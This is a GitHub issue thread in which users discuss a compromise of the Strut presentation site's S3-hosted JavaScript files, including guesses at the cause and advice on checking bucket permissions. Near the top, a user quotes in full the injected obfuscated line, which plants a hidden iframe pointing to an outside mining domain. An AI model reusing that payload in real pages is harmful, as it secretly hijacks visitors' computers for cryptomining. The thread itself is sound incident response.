Closed cjmielke closed 5 years ago
it's actually a one line injected into what appears to be each JS file, require.js, loadPresentation.js, swfobject.js, ...etc.
This is the content of the injected line:
var _0x75b214=["iframe","setAttribute","https://www.jqwww.download/lot.html","head","appendChild","1IABALrINkcv2VFJWo7ctqH0f3Y6aTf1","start","createElement"];!function(t,x){!function(x){for(;--x;)t.push(t.shift())}(++x)}(_0x75b214,367);var _0x48ae8e=function(t,x){var a=_0x75b214[t-=0];return a};a=document[_0x48ae8e("0x0")](_0x48ae8e("0x1")),a[_0x48ae8e("0x2")]("src",_0x48ae8e("0x3")),a.style.width="0px",a.style.height="1px",document[_0x48ae8e("0x4")][_0x48ae8e("0x5")](a);
I think we should email @tantaman about this. Since it's kinda urgent..
o_O
Any idea how that could have happened?
Someone has injected a script onto the *.vendor.js file of your strut.io website. Either someone hacked the file directly or has infected a CDN where you're pulling files from. The script injects an
My assumptions have been that the scripts were modified server-side, but I like the alternate theory of a CDN being compromised. Whatever it is, I imagine its a propagating mechanism that is broadly targeted, and not specific to strut.io.
@tantaman the first step is to see if those files are modified on the server. Let us know.
Completely unrelated to this repo, but figured I'd drop a note as I found this issue via a search for jqwww.download.
I just helped another open source project with almost exactly the same issue. Their JS files hosted on an AWS S3 bucket were all compromised to include the iframe injection line for jqwww.download as you show above (each page on their site had the iframe injected 6 times!).
Just leaving note that I too think it is broadly targeted. If you have S3 somehow involved in the setup of the site where these files were, even more interesting.
Yep, the whole site is hosted on s3. Was the solution for the other project to redeploy or did they literal have credentials to the bucket? On Thu, Apr 5, 2018 at 1:04 PM Anthony Bouvier notifications@github.com wrote:
Completely unrelated to this repo, but figured I'd drop a note as I found this issue via a search for jqwww.download.
I just helped another open source project with almost exactly the same issue. Their JS files hosted on an AWS S3 bucket were all compromised to include the iframe injection line for jqwww.download as you show above (each page on their site had the iframe injected 6 times!).
Just leaving note that I too think it is broadly targeted. If you have S3 somehow involved in the setup of the site where these files were, even more interesting.
— You are receiving this because you were mentioned.
Reply to this email directly, view it on GitHub https://github.com/tantaman/Strut/issues/381#issuecomment-379006508, or mute the thread https://github.com/notifications/unsubscribe-auth/AA9laymdRXZ0KHUR3Z2fSBW_ZehF4rKiks5tlk6AgaJpZM4TCvLh .
They're in the midst of investigating now actually. I just told him I found it about 2 hours ago. I just happened to be surfing their website when the fan on my MacBook went nuts so I tracked it down to his site (open in a tab) and then started picking his files apart.
Only his JS files and some images are in the S3 bucket, rest of his site isn't (as far as I know, but I'll double check with him).
So what he's done for now is just kill those js files entirely -- they were only for fontawesome stuff. So he's using the fontawesome CDN now.
But he looked at other JS files he had in same bucket and they too were compromised. I told him to check logs, look for suspicious logins, check read/write permissions on the files/bucket, etc.
While this is up for discussion, as a random thought: couldn't Strut technically be hosted on GitHub pages, since it's entirely client-side?
I've notified my contacts at Amazon. Wonder if they could grep the whole system ;)
Another repo potentially related as it mentions AWS as well. Last comment says something about their CDN permissions being set public -- not sure if that has anything to do with it, I'm not a big AWS user.
https://github.com/uBlockOrigin/uAssets/issues/1698
But figured I'd share if it helps your investigation.
I've personally never used S3 before, so this exercise has been rather educational ...
I'm really shocked that this is a problem, and that it hasn't been used for things far more nefarious!
Still compromised... :fire:
This has been resolved as of today.
Hi there. The problem isn't resolved yet
Exporting presentations results in an archive containing several injected iframes, along with a script "ricewithchicken.js"
Eats all CPU, and is a known crypto miner